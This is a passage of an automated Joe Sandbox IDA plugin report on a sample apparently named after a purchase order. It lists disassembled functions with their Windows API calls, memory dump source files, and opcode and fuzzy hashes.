                                                • _free.LIBCMT ref: 00078DE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 02b64992f98845047382d44b8847b9cc0d57862b7b6657c0d704007a48bffac4
                                                • Instruction ID: cfec849c0353807c81ed75ae5a8aa92029b8c60ce2be31b04c49682d10da749f
                                                • Opcode Fuzzy Hash: 02b64992f98845047382d44b8847b9cc0d57862b7b6657c0d704007a48bffac4
                                                • Instruction Fuzzy Hash: 01E012B1B416015BCA7465796949ED313DC5F58361B14481EB41DD7583CE28EC818238
                                                APIs
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00013C81
                                                  • Part of subcall function 000144CB: _memset.LIBCMT ref: 000144F7
                                                  • Part of subcall function 000144CB: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00014527
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: CurrentDirectoryIconNotifyShell__memset
                                                • String ID: %
                                                • API String ID: 1117195174-3960974693
                                                • Opcode ID: fb571ee45bb0cbb9979c0990f08e98f766de26aa49f132836ace896905bf6e4e
                                                • Instruction ID: e1d7bb196814f9bee6d065eb6946bd0603f3d05dfb780b725f5b0e9c90a856b8
                                                • Opcode Fuzzy Hash: fb571ee45bb0cbb9979c0990f08e98f766de26aa49f132836ace896905bf6e4e
                                                • Instruction Fuzzy Hash: E6E02625E01A4893CB14F3B0EC62AFC73249F84303F84006BE90255263CE6806C48BB1
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Timetime
                                                • String ID:
                                                • API String ID: 17336451-0
                                                • Opcode ID: 0d421bc5d8805d12543b6f7b9816fa9c1349c372decf1e06b4e399a78a995229
                                                • Instruction ID: 8c4ebdb89b7d194eaf8e4300b5e33eaf0ffb53e0ac614a2b0340b5b51e40347d
                                                • Opcode Fuzzy Hash: 0d421bc5d8805d12543b6f7b9816fa9c1349c372decf1e06b4e399a78a995229
                                                • Instruction Fuzzy Hash: 5261F071904791CFEB79CF14E84476EB7E0FF81311F15892AEC9587262D771A884CB92
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID:
                                                • API String ID: 4104443479-0
                                                • Opcode ID: 084565aa62bfc32a06c2ea2f515da3e1e66857a7f87005b1dff01ade52e77ddf
                                                • Instruction ID: c6697983af55be75e8dfbe8580c15f6551740c164a116376f3dcdacd5f95ebc3
                                                • Opcode Fuzzy Hash: 084565aa62bfc32a06c2ea2f515da3e1e66857a7f87005b1dff01ade52e77ddf
                                                • Instruction Fuzzy Hash: 883184B1604506AFC714DF68D8D1EA9F3E9FF48320B15862DE519CB691DB70E850CBD0
                                                APIs
                                                • 745AC8D0.UXTHEME ref: 00014992
                                                  • Part of subcall function 000334EC: __lock.LIBCMT ref: 000334F2
                                                  • Part of subcall function 000334EC: RtlDecodePointer.NTDLL(00000001), ref: 000334FE
                                                  • Part of subcall function 000334EC: RtlEncodePointer.NTDLL(?), ref: 00033509
                                                  • Part of subcall function 00014A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00014A73
                                                  • Part of subcall function 00014A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00014A88
                                                • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 000149D2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: InfoParametersSystem$Pointer$DecodeEncode__lock
                                                • String ID:
                                                • API String ID: 3322506685-0
                                                • Opcode ID: c525060d2cd0600a09470f46677fb17351706d997d05be9d1de7fc1b64a55dc9
                                                • Instruction ID: fe21d1d11275fb7180fd796758262bcbbf61e79591bad9c453dccf057990f5bd
                                                • Opcode Fuzzy Hash: c525060d2cd0600a09470f46677fb17351706d997d05be9d1de7fc1b64a55dc9
                                                • Instruction Fuzzy Hash: D611AC718093019BE300DF28DC4599AFFE8EF89701F00851BF845872B2DB749588CBA6
                                                APIs
                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00015981,?,?), ref: 00015E27
                                                • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,00015981,?,?), ref: 0004E0CC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: 8df9a549110cfe1cad4d8f10840f4b061ba0414c9d017ea409e59fcee03749f7
                                                • Instruction ID: d12a8c782e6a8294566a6907048c5113ad589bd07844511e97f2c632d6401e6b
                                                • Opcode Fuzzy Hash: 8df9a549110cfe1cad4d8f10840f4b061ba0414c9d017ea409e59fcee03749f7
                                                • Instruction Fuzzy Hash: B5019270184708FEF3680E24CC8AFB63ADCFB01769F108319BAE55E1E0C6B41E858B54
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: __lock_file_memset
                                                • String ID:
                                                • API String ID: 26237723-0
                                                • Opcode ID: 7cf28734b9cd87321b9ff3fa784431238d2505ccc485287b88b3361f56f51aff
                                                • Instruction ID: ae45bae4f9277ca29e2acd168a3aca57f9ec8252332af4013597e84a175e3ad0
                                                • Opcode Fuzzy Hash: 7cf28734b9cd87321b9ff3fa784431238d2505ccc485287b88b3361f56f51aff
                                                • Instruction Fuzzy Hash: 3A018431801A09EBCF23AF689C018DE7BBABF80361F148165F8145A162D7718A11DB92
                                                APIs
                                                  • Part of subcall function 00038CA8: __getptd_noexit.LIBCMT ref: 00038CA8
                                                • __lock_file.LIBCMT ref: 0003555B
                                                  • Part of subcall function 00036D8E: __lock.LIBCMT ref: 00036DB1
                                                • __fclose_nolock.LIBCMT ref: 00035566
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                • String ID:
                                                • API String ID: 2800547568-0
                                                • Opcode ID: 18f42b2f599db6e2069683a05f515f19bce71b816a3a0654d0c9ef8524fd0ca8
                                                • Instruction ID: 22936f279792f9e19f88985079879b90d32767cdbfa6e113cc049f5486c73ad4
                                                • Opcode Fuzzy Hash: 18f42b2f599db6e2069683a05f515f19bce71b816a3a0654d0c9ef8524fd0ca8
                                                • Instruction Fuzzy Hash: A9F0B471901F049AE7236F768C067EE67EA6F41336F24C249F414AB1D2CB7C59419B52
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,?,0001558F,?,?), ref: 000181DA
                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,?,?,0001558F,?,?), ref: 0001820D
                                                  • Part of subcall function 000178AD: _memmove.LIBCMT ref: 000178E9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide$_memmove
                                                • String ID:
                                                • API String ID: 3033907384-0
                                                • Opcode ID: 3720cf80bc42f6e85c965e47caeb149cb87537c60681dc69de7cfe53cf9c0f47
                                                • Instruction ID: 07d7863c34fdfa6b82c8fbc880dff2e9b350204b2852fcc1b1d2999b67864476
                                                • Opcode Fuzzy Hash: 3720cf80bc42f6e85c965e47caeb149cb87537c60681dc69de7cfe53cf9c0f47
                                                • Instruction Fuzzy Hash: FE01AD31205104BFEB256A25DC4AFBB3BADEB89360F10802AF909CE191DE309840C6B1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ab747432edda764807c9e10894a0ecb9e95c8221821ceede554ea0d4bd1eb5cc
                                                • Instruction ID: c043c689a5aa2880f77f838418478b86fb938ea3d8af3d01c6ccc5615c52daed
                                                • Opcode Fuzzy Hash: ab747432edda764807c9e10894a0ecb9e95c8221821ceede554ea0d4bd1eb5cc
                                                • Instruction Fuzzy Hash: FA517C34600614AFCF14EBA4D991EEE77E6AF85310F148168F94AAF393CB31AD45CB51
                                                APIs
                                                • SetFilePointerEx.KERNELBASE(?,?,?,00000000,?), ref: 00015CF6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: 6c6ae57d2319e673bba976b6aaefa98b7d8e76abaf2dd798611cd28a98963715
                                                • Instruction ID: a1b239f545d66b2f68248991e8b26f914699a3cc561caafa70e345e6c43f4c52
                                                • Opcode Fuzzy Hash: 6c6ae57d2319e673bba976b6aaefa98b7d8e76abaf2dd798611cd28a98963715
                                                • Instruction Fuzzy Hash: D5315C71A00B0AEFCB18DF69C8846ADB7B1FF88311F148629D81997710D771A9A0DBD0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: CallProcWindow
                                                • String ID:
                                                • API String ID: 2714655100-0
                                                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                • Instruction ID: ef5fe7178519eab0dd8fcf10fbb045be86fb6919c44f44387884da69dd5df055
                                                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                • Instruction Fuzzy Hash: 0431D574A021059BD75ADF58C4A0969FBEAFF59300F688AA5E40ACB255DB31EDC1CB80
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID:
                                                • API String ID: 4104443479-0
                                                • Opcode ID: a3deed38ee636ef381d83bd74936e511713c549215d0be76169ed53485d8cdbf
                                                • Instruction ID: a2f2f35d21ba462eb61ee513bd3f121707ff31b8694e8ee31d335b1f2502c694
                                                • Opcode Fuzzy Hash: a3deed38ee636ef381d83bd74936e511713c549215d0be76169ed53485d8cdbf
                                                • Instruction Fuzzy Hash: 1021F1B2604A09EBEB248F61EC45BBD7BB8FB54351F21847EE44AC50A2EB3194D09749
                                                APIs
                                                • ReadFile.KERNELBASE(?,?,00010000,?,00000000,?,00000000,?,?,000154B5,?,00000001,?,?,00010000,00000000), ref: 00015D76
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 43c5f6c427e42d61b36671c7d3a44f680f7313ae020f9bf70161a04d6ee7a133
                                                • Instruction ID: df3d06d87de740afae57de40dcb11dce12e9b8168cc7e6a13949c08dbe8f6731
                                                • Opcode Fuzzy Hash: 43c5f6c427e42d61b36671c7d3a44f680f7313ae020f9bf70161a04d6ee7a133
                                                • Instruction Fuzzy Hash: E2113A71200B01DFD3708F15E888BA6B7F5FF85751F10C92EE4AA8AA50D770E985CB60
                                                APIs
                                                • LoadLibraryExW.KERNEL32(?,00000000,00000002), ref: 00014F6F
                                                  • Part of subcall function 00014CC8: FreeLibrary.KERNEL32(00000000), ref: 00014D02
                                                  • Part of subcall function 00014DD0: _memmove.LIBCMT ref: 00014E1A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Library$FreeLoad_memmove
                                                • String ID:
                                                • API String ID: 3093072483-0
                                                • Opcode ID: dff560a2180e9061657ef96db3073176d39447c662be41698d53c52f30b0fc18
                                                • Instruction ID: 185d22944bdd9cf8e4c5d617786ccb83dc71c752371c325e096113d8d336a77e
                                                • Opcode Fuzzy Hash: dff560a2180e9061657ef96db3073176d39447c662be41698d53c52f30b0fc18
                                                • Instruction Fuzzy Hash: F0016831700206AACF20EF70DC46BEE73A59F80711F20C83EF405EB2D2DA759A959B60
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID:
                                                • API String ID: 4104443479-0
                                                • Opcode ID: 82dfc27d850c672496c3cf941414b5abfcb305a02afe7f879abfb8bde7b20006
                                                • Instruction ID: ff8485bdb042ff4aae065386f5967f3e2ee009d722f1138b800a22f3a57498da
                                                • Opcode Fuzzy Hash: 82dfc27d850c672496c3cf941414b5abfcb305a02afe7f879abfb8bde7b20006
                                                • Instruction Fuzzy Hash: 3201D6722057056ED3219F28CC02FA7BBA89B44760F10853EF61ECB191EA31E4418B50
                                                APIs
                                                • Shell_NotifyIconW.SHELL32(00000000,?), ref: 000144A6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: IconNotifyShell_
                                                • String ID:
                                                • API String ID: 1144537725-0
                                                • Opcode ID: 911b6201a28ec30565bc8e4e1548927e632d6d67da84d0507a9e8957c3b0f27a
                                                • Instruction ID: 471741e001346d3cec36573b6a2caf0f527819ea39ed4c3c9f9fbc7ffe148c3a
                                                • Opcode Fuzzy Hash: 911b6201a28ec30565bc8e4e1548927e632d6d67da84d0507a9e8957c3b0f27a
                                                • Instruction Fuzzy Hash: EB1130B1506711CFE751DF24D4807EBBBF0BB49305F00092EE99A97251D775A588CB91
                                                APIs
                                                • FreeLibrary.KERNEL32(?,?,?), ref: 00014FDE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
